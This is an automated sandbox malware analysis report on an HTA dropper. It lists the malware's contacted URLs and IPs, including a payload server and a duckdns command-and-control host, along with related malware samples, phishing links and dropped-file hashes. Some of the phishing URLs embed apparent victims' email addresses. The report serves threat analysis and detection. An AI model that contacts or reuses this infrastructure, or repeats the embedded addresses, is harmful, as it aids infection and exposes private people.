https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000003.00000002.2201944807.0000000004CA7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://172.245.142.60/551/sheism	powershell.exe, 00000003.00000002.2201944807.0000000004F96000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000008.00000002.2433234486.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000003.00000002.2201944807.0000000004CA7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000008.00000002.2433234486.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://172.245.142.60/551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIFl	powershell.exe, 00000003.00000002.2206466592.0000000007FE6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://172.245.142.60/551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIFC:	powershell.exe, 00000003.00000002.2206466592.000000000801E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com;	powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://analytics.paste.ee	powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://go.micros	powershell.exe, 00000003.00000002.2201944807.000000000513E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000008.00000002.2433234486.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://geoplugin.net/json.gp	CasPol.exe	false		high
https://www.google.com	powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://res.cloudinary.com	powershell.exe, 00000008.00000002.2433234486.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgt	powershell.exe, 00000008.00000002.2433234486.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://geoplugin.net/json.gp/C	powershell.exe, 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000003.00000002.2201944807.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2433234486.0000000004A81000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000003.00000002.2201944807.0000000004CA7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.2203877007.0000000005BB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://analytics.paste.ee;	powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdnjs.cloudflare.com	powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdnjs.cloudflare.com;	powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.2201944807.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2433234486.0000000004A81000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.gravatar.com	powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://themes.googleusercontent.com	powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
151.101.1.137	cloudinary.map.fastly.net	United States	54113	FASTLYUS	false
172.245.142.60	unknown	United States	36352	AS-COLOCROSSINGUS	true
104.21.84.67	paste.ee	United States	13335	CLOUDFLARENETUS	false
192.169.69.26	rmcnewprojectadd.duckdns.org	United States	23033	WOWUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1572998
Start date and time:	2024-12-11 11:22:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	nicegirlforyou.hta
Detection:	MAL
Classification:	mal100.rans.phis.troj.spyw.expl.evad.winHTA@18/16@6/4
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 100% Number of executed functions: 58 Number of non-executed functions: 183
Cookbook Comments:	Found application associated with file extension: .hta Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mshta.exe, PID 3512 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:22:56	API Interceptor	121x Sleep call for process: powershell.exe modified
05:24:06	API Interceptor	3812161x Sleep call for process: CasPol.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
151.101.1.137	Invoice A037.xls	Get hash	malicious	Unknown	Browse
	Orden_de_Compra_Nmero_6782929219.xls	Get hash	malicious	HTMLPhisher	Browse
	Aktarma,pdf.vbs	Get hash	malicious	Remcos	Browse
	16547.js	Get hash	malicious	MassLogger RAT	Browse
	#U041f#U043b#U0430#U0449#U0430#U043d#U0435.docx	Get hash	malicious	Remcos	Browse
	nr101612_Order.wsf	Get hash	malicious	Remcos	Browse
	1013911.js	Get hash	malicious	FormBook	Browse
	http://itsecurityupdate.com	Get hash	malicious	Unknown	Browse
	https://www.payment.token2049.com/page/3156941?widget=true&	Get hash	malicious	Unknown	Browse
	https://pitch.com/public/655a5c71-d891-49c9-aedc-7c00de75174d	Get hash	malicious	Unknown	Browse
172.245.142.60	NESTLE_MEXICO_Purchase_Order_10122024.xls	Get hash	malicious	Unknown	Browse	172.245.142.60/551/wcb/nicegirlforyou.hta
	matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	172.245.142.60/466/kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme.tIF
	Orden_de_Compra_Nmero_6782929219.xls	Get hash	malicious	HTMLPhisher	Browse	172.245.142.60/466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta
104.21.84.67	Order_DEC2024.wsf	Get hash	malicious	Remcos	Browse	paste.ee/d/GXRLA
	nr101612_Order.wsf	Get hash	malicious	Remcos	Browse	paste.ee/d/81FCf
	Doc261124.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	paste.ee/d/MQJcS
	Chitanta bancara - #113243.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/u4bvR
	rdevuelto_Pagos.wsf	Get hash	malicious	AgentTesla	Browse	paste.ee/d/SDfNF
	Product list 0980DF098A7.xls	Get hash	malicious	Unknown	Browse	paste.ee/d/enGXm
	Payment_advice.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/wXm0Y
	SHREE GANESH BOOK SERVICES-347274.xls	Get hash	malicious	Unknown	Browse	paste.ee/d/eA3FM
	dereac.vbe	Get hash	malicious	Unknown	Browse	paste.ee/d/JZHbW
	P018400.xla.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/kmRFs

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
rmcnewprojectadd.duckdns.org	matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	192.3.101.9
cloudinary.map.fastly.net	invoice09850.xls	Get hash	malicious	Remcos	Browse	151.101.65.137
	Invoice A037.xls	Get hash	malicious	Unknown	Browse	151.101.1.137
	Plugin81139.js	Get hash	malicious	PureLog Stealer, RevengeRAT, zgRAT	Browse	151.101.129.137
	PO-8776-2024.js	Get hash	malicious	Remcos	Browse	151.101.129.137
	New Order Enquiry.js	Get hash	malicious	AgentTesla	Browse	151.101.193.137
	NESTLE_MEXICO_Purchase_Order_10122024.xls	Get hash	malicious	Unknown	Browse	151.101.65.137
	Orden_de_Compra_Nmero_6782929219.xls	Get hash	malicious	HTMLPhisher	Browse	151.101.65.137
	Aktarma,pdf.vbs	Get hash	malicious	Remcos	Browse	151.101.1.137
	xxx.doc	Get hash	malicious	Unknown	Browse	151.101.1.137
	Potvrda_o_uplati.docx.doc	Get hash	malicious	Unknown	Browse	151.101.193.137
paste.ee	nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	104.21.84.67
	invoice09850.xls	Get hash	malicious	Remcos	Browse	188.114.97.6
	Invoice A037.xls	Get hash	malicious	Unknown	Browse	188.114.97.6
	PO-8776-2024.js	Get hash	malicious	Remcos	Browse	104.21.84.67
	NESTLE_MEXICO_Purchase_Order_10122024.xls	Get hash	malicious	Unknown	Browse	188.114.97.6
	matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	104.21.84.67
	Orden_de_Compra_Nmero_6782929219.xls	Get hash	malicious	HTMLPhisher	Browse	188.114.96.6
	Aktarma,pdf.vbs	Get hash	malicious	Remcos	Browse	172.67.187.200
	ithgreat.doc	Get hash	malicious	Unknown	Browse	188.114.97.6
	xxx.doc	Get hash	malicious	Unknown	Browse	188.114.96.6

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FASTLYUS	invoice09850.xls	Get hash	malicious	Remcos	Browse	151.101.65.137
	Invoice A037.xls	Get hash	malicious	Unknown	Browse	151.101.1.137
	Plugin81139.js	Get hash	malicious	PureLog Stealer, RevengeRAT, zgRAT	Browse	151.101.129.137
	https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.uk	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	Nieuwebestellingen10122024.exe	Get hash	malicious	FormBook	Browse	151.101.1.108
	https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.com	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	Hays eft_Receipt number N302143235953.htm	Get hash	malicious	Unknown	Browse	151.101.194.137
	EFT Remittance_(Deerequipment)CQDM.html	Get hash	malicious	Unknown	Browse	151.101.2.137
	https://cbthz04.na1.hs-sales-engage.com/Ctc/WX+23284/cbtHZ04/JlY2-6qcW95jsWP6lZ3mVW5xSkdC387hZlVGwpQc3P-q7wW4XgB4f44hCn1W3xYp5D6c1ttLW5FlJm432C9CFN1DvHyz7sRM3W1xbpQP3rjw57VdgQ8b5y5ncrN49hcz4pvY25W96rvby79_LjyW2hcbt-9lVY_PW61b5ZB17S04cW1Q1Z0m1qr_XnW4-Nvh_3JShBfW6ZlQ2B7-rTd7W5m54Pt4FXHVhN8f7LcVPRggDW6t0wZX12kCc8W8SWxd-65BfMKN89z7Dpr6bFRW62hqfp7800yqW6mjxRN41FPzSV9Cmrg5cL__SW36PjDN1zwkS6W21jP9H8v9kL6W995dJp10hcCRVsGjCC5n0FZjN7sg51mKQ1rDW15tQ1c3HKBShW818lp-6tdDqnf2cjw2s04	Get hash	malicious	Unknown	Browse	151.101.2.137
	https://vcsfi.kidsavancados.com/	Get hash	malicious	Captcha Phish	Browse	151.101.66.137
WOWUS	1733858044e64c59622ab494dda2ff98fce76991f7e15e513d6a3620e7f58ad7cc67d3889c571.dat-decoded.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	192.169.69.26
	f5ATZ1i5CU.exe	Get hash	malicious	RedLine, XWorm	Browse	192.169.69.26
	P0J8k3LhVV.exe	Get hash	malicious	Nanocore	Browse	192.169.69.26
	173349055645d097cf36f6a7cc8cd8874001209539b453cb16f6acd61c0d845ab62e19e89d339.dat-decoded.exe	Get hash	malicious	AsyncRAT	Browse	192.169.69.26
	173349048648c854fdb460c6c7c5fd91e325ea882961d8aa5918c705b053bb8e9350ae27c8877.dat-decoded.exe	Get hash	malicious	AsyncRAT	Browse	192.169.69.26
	17334905521d597933f8aaddb97573b46d117b288a865f8a218fac0e15588edac3edcab35b588.dat-decoded.exe	Get hash	malicious	AsyncRAT, PureLog Stealer	Browse	192.169.69.26
	17334905555b1bb5616b6229d3e91468cd944baaeea0d1c904cc91a0fe89b683d653c3710f732.dat-decoded.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	192.169.69.26
	17334792691d3587abc182d697c2a82dd4ad88afaea9fc5290ea9e42c7eec649b5ab319fda603.dat-decoded.exe	Get hash	malicious	AsyncRAT	Browse	192.169.69.26
	mgtOKjHZ1s.exe	Get hash	malicious	Remcos	Browse	192.169.69.26
	clfCnDEDd1.exe	Get hash	malicious	Remcos	Browse	192.169.69.26
AS-COLOCROSSINGUS	nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	192.3.101.149
	invoice09850.xls	Get hash	malicious	Remcos	Browse	192.3.101.149
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	107.172.44.175
	Invoice A037.xls	Get hash	malicious	Unknown	Browse	23.95.235.29
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	107.172.44.175
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	107.172.44.175
	Josho.arm.elf	Get hash	malicious	Unknown	Browse	104.170.167.20
	hax.arm7.elf	Get hash	malicious	Mirai	Browse	107.172.219.218
	ORDER-6070Y689_0PF57682456_DECVC789378909740.js	Get hash	malicious	WSHRat, Snake Keylogger	Browse	192.3.220.6
	NESTLE_MEXICO_Purchase_Order_10122024.xls	Get hash	malicious	Unknown	Browse	172.245.142.60
CLOUDFLARENETUS	nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	104.21.84.67
	invoice09850.xls	Get hash	malicious	Remcos	Browse	188.114.96.6
	Reqt 83291.vbs	Get hash	malicious	Remcos, GuLoader	Browse	104.21.86.72
	EBUdultKh7.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.78.149
	https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.uk	Get hash	malicious	HTMLPhisher	Browse	104.18.41.169
	https://renemattner.simvoly.com/?preview=__PREVIEW_ONLY&c=E,1,Ks6Sg62CfOE_CkRSGsjWzEZqQJ4kslHIx5N9ygK8IrTT7dwyHfXwvE4VbQEnQwQXPVvQMpZGcaIV_fVQbP7vMcdrXBRSSDaH5Z18aBsWUw,,&typo=1	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	Nieuwebestellingen10122024.exe	Get hash	malicious	FormBook	Browse	172.64.41.3
	https://smialex.id/Frbleuelsas	Get hash	malicious	Anonymous Proxy	Browse	104.21.37.221
	https://smialex.id/Frbleuelsas	Get hash	malicious	Anonymous Proxy	Browse	172.67.213.233
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	104.21.84.67 151.101.1.137
	Plugin81139.js	Get hash	malicious	PureLog Stealer, RevengeRAT, zgRAT	Browse	104.21.84.67 151.101.1.137
	Reqt 83291.vbs	Get hash	malicious	Remcos, GuLoader	Browse	104.21.84.67 151.101.1.137
	https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.uk	Get hash	malicious	HTMLPhisher	Browse	104.21.84.67 151.101.1.137
	https://smialex.id/Frbleuelsas	Get hash	malicious	Anonymous Proxy	Browse	104.21.84.67 151.101.1.137
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.84.67 151.101.1.137
	Bank Swift and SOA PVRN0072700314080353_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.84.67 151.101.1.137
	QUOTATION#08670.exe	Get hash	malicious	AgentTesla	Browse	104.21.84.67 151.101.1.137
	DEC 2024 RFQ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.84.67 151.101.1.137
	apDMcnqqWs.exe	Get hash	malicious	Unknown	Browse	104.21.84.67 151.101.1.137

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart[1].tiff

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (3203), with CRLF line terminators
Category:	dropped
Size (bytes):	153952
Entropy (8bit):	3.8067197460998417
Encrypted:	false
SSDEEP:	3072:HJlofF4RJFAiJlofF4RJFNiJlofF4RJFl:HJlofeRJFAiJlofeRJFNiJlofeRJFl
MD5:	5CE00A79A9F41D260446BFDCC6267ADF
SHA1:	0B2B90BEB56C59916B98004B1444698538729822
SHA-256:	EFAB5D21ED82F610BC5F1734B909A7E5C3A6C2ECEBB276DD03B4D5BAF8E9B058
SHA-512:	D4DE7FE61F23CE7524ED3123319AC93F33AE1806BD426045CA9DF1FA9EE82CCA58AA314711BBDE6A6FFA2EEE98DC20CC5E4D80D2EC7ABB028BE0639944714FEE
Malicious:	false
Preview:	...... . . . .....P.t.u.O.q.o.f.e.c.d.G.k.H.L.t. .=. .".c.I.k.R.N.r.W.W.z.n.d.u.x.p.B.".....n.G.T.z.L.p.K.i.c.q.p.t.i.a.k. .=. .".G.U.K.e.W.L.p.u.e.j.c.q.l.e.K.".....e.L.e.j.L.A.W.U.k.G.B.G.W.b.L. .=. .".W.c.T.W.L.l.b.i.K.W.i.m.J.m.O.".........K.N.k.U.n.z.W.o.u.h.Q.K.C.o.W. .=. .".O.z.o.G.A.k.p.a.R.g.h.P.i.d.l.".....l.k.R.h.m.T.i.u.i.x.B.L.f.x.b. .=. .".P.L.n.G.e.k.q.a.I.n.W.f.i.L.a.".....N.c.t.U.W.s.C.b.B.L.l.m.L.J.H. .=. .".t.i.G.W.W.n.m.U.o.L.k.L.K.e.Q.".....W.i.I.K.l.n.i.K.l.j.p.A.k.G.Z. .=. .".G.i.N.k.o.B.U.x.L.c.s.W.b.L.Z.".....c.W.e.q.B.L.o.o.z.j.K.t.o.L.Q. .=. .".n.i.p.Z.i.W.j.K.L.z.m.G.W.A.v.".....W.B.o.q.i.Q.l.i.W.C.W.l.h.i.k. .=. .".O.A.G.W.K.m.Z.S.L.c.x.U.r.W.d.".....b.A.L.U.L.q.G.x.L.W.f.u.z.m.k. .=. .".l.b.m.c.W.G.A.O.Z.A.m.i.p.c.K.".....e.p.L.l.x.r.K.N.K.s.k.h.A.U.U. .=. .".L.c.K.i.K.i.i.z.J.N.a.o.C.b.S.".....l.k.L.h.a.P.O.n.K.h.u.j.f.k.h. .=. .".L.h.P.C.T.e.L.Z.m.n.k.G.u.Z.n.".....J.G.i.L.c.C.f.G.K.N.C.t.t.e.k. .=. .".W.i.i.W.z.W.b.k.B.P.b.o.G.a.c.".....P.m.L.W.f.S.k.S.

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5829
Entropy (8bit):	4.901113710259376
Encrypted:	false
SSDEEP:	96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
MD5:	7827E04B3ECD71FB3BD7BEEE4CA52CE8
SHA1:	22813AF893013D1CCCACC305523301BB90FF88D9
SHA-256:	5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
SHA-512:	D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
Malicious:	false
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1144
Entropy (8bit):	5.290848674040258
Encrypted:	false
SSDEEP:	24:32gSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKM9r8Hd:GgSU4y4RQmFoUeWmfmZ9tK8NF9u
MD5:	374272AB01A3AD6B586FC209D47F884D
SHA1:	8C785EB3C085C24C140A197D553DE29B3AF5628A
SHA-256:	FEEC1C388B6D48779BD53FDC17D19CCFBABF759B59C84DAC3DA1B6D3D1376981
SHA-512:	4266E69AA211B66EC5E5BF649C75D9D136B735B41FDEC089EA61919DC3E93A2FC7A4B274A313234AE813F0DA7DA16EB3236039C77A7A66DC00AFFE26990790B3
Malicious:	false
Preview:	@...e...........................................................@...............(..o...B.Rb&............Microsoft.VisualBasic...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

C:\Users\user\AppData\Local\Temp\RESFAE8.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Wed Dec 11 12:19:34 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1340
Entropy (8bit):	3.997317536876093
Encrypted:	false
SSDEEP:	24:HdK9oVajaHJwKcjmfwI+ycuZhNiakS6PNnqSed:5IOSK2mo1ulia32qS+
MD5:	37DFE4CF50134EBD7ACF880D8A86AAF2
SHA1:	A46E04DD19EF8E7AA87CC7170B373A00B1BDD921
SHA-256:	7B787D2CAA693D3803C3BD5EE2CAD49C086D2DB1CCD9673194E8DBEAD8337455
SHA-512:	75461E06EB0D8AE7EA4040163FB4A53D315F7C86F4F678D44BB7C75D5A614E5FDD0526D78D70A257389F319D791D308A4DA02A4AA670CC465BCFB7EC8B72B5D4
Malicious:	false
Preview:	L...V.Yg.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........W....c:\Users\user\AppData\Local\Temp\gxlowwdn\CSC56436D359159402F8D448B12D32335C6.TMP......................."\..V.............7.......C:\Users\user\AppData\Local\Temp\RESFAE8.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...g.x.l.o.w.w.d.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eof2rwno.1ob.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
